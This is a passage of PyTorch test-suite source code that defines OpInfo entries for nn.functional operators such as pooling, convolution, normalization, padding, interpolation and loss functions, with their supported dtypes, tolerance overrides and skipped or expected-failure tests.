~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <--- HERE # DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_avg_pool3d), OpInfo('nn.functional.adaptive_max_pool1d', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # got: Batching rule not implemented for aten::flatten.using_ints check_batched_forward_grad=False, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_max_pool1d), OpInfo('nn.functional.adaptive_max_pool2d', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), decorators=( # RuntimeError: # adaptive_max_pool2d(Tensor input, int[2] output_size) -> (Tensor): # Expected a value of type 'List[int]' for argument 'output_size' but # instead found type 'Tuple[NoneType, int]'. : # File "<string>", line 3 # def the_method(i0): # return torch.nn.functional.adaptive_max_pool2d(i0, (None, 7)) # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <--- HERE DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # got: Batching rule not implemented for aten::flatten.using_ints check_batched_forward_grad=False, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_max_pool2d), OpInfo('nn.functional.adaptive_max_pool3d', dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), decorators=( # RuntimeError: # adaptive_max_pool3d(Tensor input, int[3] output_size) -> (Tensor): # Expected a value of type 'List[int]' for argument 'output_size' but # instead found type 'Tuple[NoneType, NoneType, NoneType]'. : # File "<string>", line 3 # # def the_method(i0): # return torch.nn.functional.adaptive_max_pool3d(i0, (None, None, None)) # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <--- HERE # DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # got: Batching rule not implemented for aten::flatten.using_ints check_batched_forward_grad=False, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_max_pool3d), OpInfo('nn.functional.avg_pool1d', aten_name='avg_pool1d', supports_autograd=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.int64, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_avgpool1d), OpInfo('nn.functional.avg_pool3d', aten_name='avg_pool3d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.int64), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_avgpool3d, skips=( # AssertionError: Tensor-likes are not close! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out', device_type='cpu'), )), OpInfo( "nn.functional.binary_cross_entropy_with_logits", aten_name="binary_cross_entropy_with_logits", supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_binary_cross_entropy_with_logits, skips=( DecorateInfo( unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,) ), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', "test_fn_gradgrad", dtypes=(torch.float64,)), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', "test_fn_fwgrad_bwgrad", dtypes=(torch.float64,)), ), ), UnaryUfuncInfo( 'nn.functional.relu', aten_name="relu", ref=lambda a: np.where(a <= 0, 0, a), supports_autograd=True, dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_nn_activation_relu, supports_out=False, supports_fwgrad_bwgrad=True, supports_forward_ad=True), OpInfo('nn.functional.conv_transpose1d', aten_name='conv_transpose1d', aliases=('conv_transpose1d',), dtypes=floating_types_and(torch.int64), dtypesIfCUDA=floating_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_conv_transpose1d, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=[ DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-04, rtol=1.3e-06), }), 'TestCommon', 'test_variant_consistency_eager', device_type='cuda')], skips=( # RuntimeError: !lhs.isAliasOf(rhs)INTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":104, please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False,), OpInfo('nn.functional.conv_transpose2d', aten_name='conv_transpose2d', aliases=('conv_transpose2d',), dtypes=floating_types_and(torch.int64), dtypesIfCUDA=floating_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_conv_transpose2d, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=[ DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-04, rtol=1.3e-06), }), 'TestCommon', 'test_variant_consistency_eager', device_type='cuda')], skips=( # RuntimeError: !lhs.isAliasOf(rhs)INTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":104, please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False,), OpInfo('nn.functional.conv_transpose3d', aten_name='conv_transpose3d', aliases=('conv_transpose3d',), dtypes=floating_types_and(torch.int64), dtypesIfCUDA=floating_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_conv_transpose3d, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=[ DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-04, rtol=1.3e-06), }), 'TestCommon', 'test_variant_consistency_eager', device_type='cuda'), DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-04, rtol=1.3e-06), }), 'TestCommon', 'test_noncontiguous_samples', device_type='cuda')], skips=( # RuntimeError: !lhs.isAliasOf(rhs)INTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":104, please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Skipped! 75029"), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), DecorateInfo(unittest.skip("Skipped! 75363"), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), DecorateInfo(unittest.skip("Skipped! RuntimeError: bias tensor has to be contiguous"), 'TestGradients', 'test_forward_mode_AD', device_type='cuda', active_if=TEST_WITH_ROCM), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad', device_type='cuda', active_if=(not TEST_CUDNN)), ), supports_out=False,), OpInfo('nn.functional.conv1d', aliases=('conv1d',), aten_name='conv1d', dtypes=floating_and_complex_types_and(torch.int64, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, torch.chalf, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_conv1d, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=( DecorateInfo( toleranceOverride({torch.chalf: tol(atol=1e-2, rtol=1e-2)}), 'TestCommon', 'test_complex_half_reference_testing' ), DecorateInfo( toleranceOverride({torch.chalf: tol(atol=1e-3, rtol=1e-3)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', ), ), skips=( # RuntimeError: !lhs.isAliasOf(rhs)INTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":103, please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # Ref: https://github.com/pytorch/pytorch/issues/75309 # AssertionError: None mismatch: torch.complex128 is not None DecorateInfo(unittest.expectedFailure, 'TestDtypeCustomRules', 'test_custom_rules', dtypes=(torch.complex64, torch.complex128)), # Ref: https://github.com/pytorch/pytorch/issues/75309 # RuntimeError: UNSUPPORTED DTYPE: complex DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.complex64, torch.complex128)), # Ref: https://github.com/pytorch/pytorch/issues/78077 DecorateInfo(unittest.expectedFailure, 'TestExpandedWeightFunctional', 'test_expanded_weight_per_sample_grad', dtypes=(torch.float64,)), ), supports_expanded_weight=True, supports_out=False,), OpInfo('nn.functional.conv2d', aliases=('conv2d',), aten_name='conv2d', dtypes=floating_and_complex_types_and(torch.int64, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, torch.chalf, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=partial(sample_inputs_conv2d), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=( DecorateInfo( toleranceOverride({torch.chalf: tol(atol=6e-2, rtol=5e-2)}), 'TestCommon', 'test_complex_half_reference_testing', ), DecorateInfo( toleranceOverride({torch.chalf: tol(atol=1e-2, rtol=1e-2)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', ), ), skips=( # RuntimeError: !lhs.isAliasOf(rhs)INTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":103, please report a bug to PyTorch. DecorateInfo(unittest.skip("Works on some configs!"), 'TestJit', 'test_variant_consistency_jit'), # Ref: https://github.com/pytorch/pytorch/issues/75309 # AssertionError: None mismatch: torch.complex128 is not None DecorateInfo(unittest.expectedFailure, 'TestDtypeCustomRules', 'test_custom_rules', dtypes=(torch.complex64, torch.complex128)), # RuntimeError: UNSUPPORTED DTYPE: complex DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.complex64, torch.complex128)), # Ref: https://github.com/pytorch/pytorch/issues/78077 DecorateInfo(unittest.expectedFailure, 'TestExpandedWeightFunctional', 'test_expanded_weight_per_sample_grad', dtypes=(torch.float64,)), ), supports_expanded_weight=True, supports_out=False,), OpInfo('nn.functional.group_norm', aten_name='group_norm', aliases=('group_norm',), ref=reference_group_norm, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[ # RuntimeError: Cannot insert a Tensor that requires grad as a constant. # Consider making it a parameter or input, or detaching the gradient DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)) ], sample_inputs_func=sample_inputs_group_norm, supports_expanded_weight=True,), OpInfo('nn.functional.instance_norm', # no ref because instance_norm will often have numerical instability (large numbers or nan) dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, decorators=[ # RuntimeError: Cannot insert a Tensor that requires grad as a constant. # Consider making it a parameter or input, or detaching the gradient DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad', active_if=TEST_WITH_ROCM) ], sample_inputs_func=sample_inputs_instance_norm, supports_expanded_weight=True,), OpInfo('nn.functional.layer_norm', aten_name='layer_norm', aten_backward_name='layer_norm_backward', aliases=('layer_norm',), ref=reference_layer_norm, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, assert_jit_shape_analysis=True, decorators=[ DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-05, rtol=1e-03)}), 'TestCommon', 'test_numpy_refs' ) ], sample_inputs_func=sample_inputs_layer_norm, supports_expanded_weight=True,), OpInfo('nn.functional.local_response_norm', dtypes=floating_types_and(torch.int64, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[ # RuntimeError: falseINTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ], sample_inputs_func=sample_inputs_local_response_norm,), OpInfo('nn.functional.pad', variant_test_name='constant', aten_name='constant_pad_nd', supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half), sample_inputs_func=partial(sample_inputs_nn_pad, mode='constant'), supports_out=False), OpInfo('nn.functional.pad', variant_test_name='reflect', supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_and_complex_types(), dtypesIfCUDA=floating_and_complex_types_and(torch.half), sample_inputs_func=partial(sample_inputs_nn_pad, mode='reflect'), skips=( # Doesn't have a corresponding aten operator. # RuntimeError: falseINTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), ), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_out=False), OpInfo('nn.functional.pad', variant_test_name='replicate', supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_and_complex_types(), dtypesIfCUDA=floating_and_complex_types_and(torch.half), sample_inputs_func=partial(sample_inputs_nn_pad, mode='replicate'), skips=( # Doesn't have a corresponding aten operator. # RuntimeError: falseINTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), ), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_out=False), OpInfo('nn.functional.pad', variant_test_name='circular', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half), sample_inputs_func=partial(sample_inputs_nn_pad, mode='circular'), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_grad=False, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, skips=( # Doesn't have a corresponding aten operator. # RuntimeError: falseINTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), ), supports_out=False), OpInfo('nn.functional.hardswish', aten_name="hardswish", aten_backward_name='hardswish_backward', supports_autograd=True, assert_autodiffed=True, sample_inputs_func=sample_inputs_hardswish, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_gradgrad=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, autodiff_nonfusible_nodes=["aten::hardswish"]), OpInfo('nn.functional.unfold', aten_name='im2col', aten_backward_name='im2col_backward', dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half), sample_inputs_func=sample_inputs_nn_unfold, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, skips=( # NOTE: this failure may not reproduce consistently on different systems # false INTERNAL ASSERT FAILED at "...torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185 DecorateInfo(unittest.skip("Internal assert failed!"), 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='nearest', supports_autograd=True, supports_fwgrad_bwgrad=True, supports_forward_ad=True, dtypes=floating_types_and(torch.uint8, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.uint8), sample_inputs_func=partial(sample_inputs_interpolate, 'nearest'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='linear', supports_autograd=True, supports_fwgrad_bwgrad=True, supports_forward_ad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), sample_inputs_func=partial(sample_inputs_interpolate, 'linear'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='bilinear', supports_fwgrad_bwgrad=True, supports_autograd=True, supports_forward_ad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=partial(sample_inputs_interpolate, 'bilinear'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='bicubic', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), sample_inputs_func=partial(sample_inputs_interpolate, 'bicubic'), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='trilinear', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=partial(sample_inputs_interpolate, 'trilinear'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='area', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_interpolate, 'area'), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.upsample_bilinear', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=partial(sample_inputs_upsample, 'bilinear'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo( "nn.functional.soft_margin_loss", ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), supports_out=False, supports_forward_ad=True, # doesn't support grad on target sample_inputs_func=partial(sample_inputs_loss, rhs_requires_grad=False), ), OpInfo('nn.functional.upsample_nearest', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.uint8, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.uint8), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=partial(sample_inputs_upsample, 'nearest'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo( "nn.functional.margin_ranking_loss", ref=_NOTHING, dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bfloat16, torch.float16), supports_out=False, sample_inputs_func=sample_inputs_margin_ranking_loss, error_inputs_func=error_inputs_margin_ranking_loss, reference_inputs_func=reference_inputs_margin_ranking_loss, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), )), OpInfo( "nn.functional.multi_margin_loss", ref=_NOTHING, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), supports_out=False, supports_gradgrad=False, sample_inputs_func=sample_inputs_multi_margin_loss, ), OpInfo( "nn.functional.multilabel_margin_loss", ref=_NOTHING, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), supports_out=False, supports_gradgrad=False, sample_inputs_func=sample_inputs_multilabel_margin_loss ), OpInfo('nn.functional.leaky_relu', aliases=None, aten_name="leaky_relu", aten_backward_name='leaky_relu_backward', sample_inputs_func=sample_inputs_leaky_relu, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_autograd=True, assert_autodiffed=True, supports_gradgrad=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=["aten::leaky_relu"]), OpInfo( "nn.functional.multilabel_soft_margin_loss", ref=_NOTHING, supports_out=False, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_multilabel_soft_margin_loss, supports_forward_ad=True, decorators=( DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-4, rtol=1e-4)}), "TestJit", "test_variant_consistency_jit", ), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ), skips=( # AssertionError: False is not true : Scalars failed to compare as equal! 0 != 4096 # __main__.TestJitCUDA.test_variant_consistency_jit_nn_functional_multilabel_soft_margin_loss_cuda_float32 # leaked 4096 bytes CUDA memory on device 0 DecorateInfo( # Skip instead of expectedFailure because this fails # locally for me but passes in CI. unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", device_type="cuda", ), ), ), OpInfo('nn.functional.avg_pool2d', aten_name='avg_pool2d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.int64, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_avgpool2d, skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out', device_type='cuda'), )), OpInfo('nn.functional.fractional_max_pool2d', supports_autograd=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.fractional_max_pool2d, input, *args, **kwargs), # vmap does not support random operations check_batched_forward_grad=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), test_neg_view=False, sample_inputs_func=sample_inputs_fractional_max_pool2d, decorators=( # FIXME: AssertionError: False is not true : Tensors failed to compare as equal! DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270 DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'))), OpInfo('nn.functional.fractional_max_pool3d', supports_autograd=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.fractional_max_pool3d, input, *args, **kwargs), # vmap does not support random operations check_batched_forward_grad=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), test_neg_view=False, sample_inputs_func=sample_inputs_fractional_max_pool3d, decorators=( # FIXME: both derivatives are implemented incorrectly # https://github.com/pytorch/pytorch/issues/69322 # FIXME: AssertionError: False is not true : Tensors failed to compare as equal! DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270 DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'),)), OpInfo('nn.functional.max_pool1d', aten_name='max_pool1d', supports_autograd=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # got: Batching rule not implemented for aten::flatten.using_ints check_batched_forward_grad=False, # TODO: add shape checks assert_jit_shape_analysis=False, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), skips=( # Pre-existing condition; Needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator', device_type='cpu'), DecorateInfo(unittest.skip("Works on some configs"), 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Works on some conifgs"), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', dtypes=(torch.bfloat16,)), ), sample_inputs_func=sample_inputs_max_pool), OpInfo('nn.functional.max_pool2d', aten_name='max_pool2d', supports_autograd=True, # Vmap is not happy with non-contiguous (channels_last) inputs check_batched_gradgrad=False, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # got: Batching rule not implemented for aten::flatten.using_ints check_batched_forward_grad=False, assert_jit_shape_analysis=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_max_pool), OpInfo('nn.functional.max_pool3d', aten_name='max_pool3d', supports_autograd=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # got: Batching rule not implemented for aten::flatten.using_ints check_batched_forward_grad=False, # TODO: add shape checks assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), # TODO: investigate nondeterminism gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_max_pool), OpInfo('nn.functional.max_unpool1d', aten_name='max_unpool1d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_max_unpool, skips=( # Gradients are tested in `variant_test_name=grad` below. # We skip tests here because there is non-determinism in backward # with gather, when there are writes into the same memory location, # and if there are several indices pointing to the same memory, # gradcheck is oblivious about that and cannot perturb them all at once # (see sample_inputs_max_unpool_grad to find out more). DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD'), )), OpInfo('nn.functional.max_unpool1d', variant_test_name='grad', aten_name='max_unpool1d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_max_unpool_grad), OpInfo('nn.functional.max_unpool2d', aten_name='max_unpool2d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_max_unpool, skips=( # Gradients are tested in `variant_test_name=grad` below. # We skip tests here because there is non-determinism in backward # with gather, when there are writes into the same memory location, # and if there are several indices pointing to the same memory, # gradcheck is oblivious about that and cannot perturb them all at once # (see 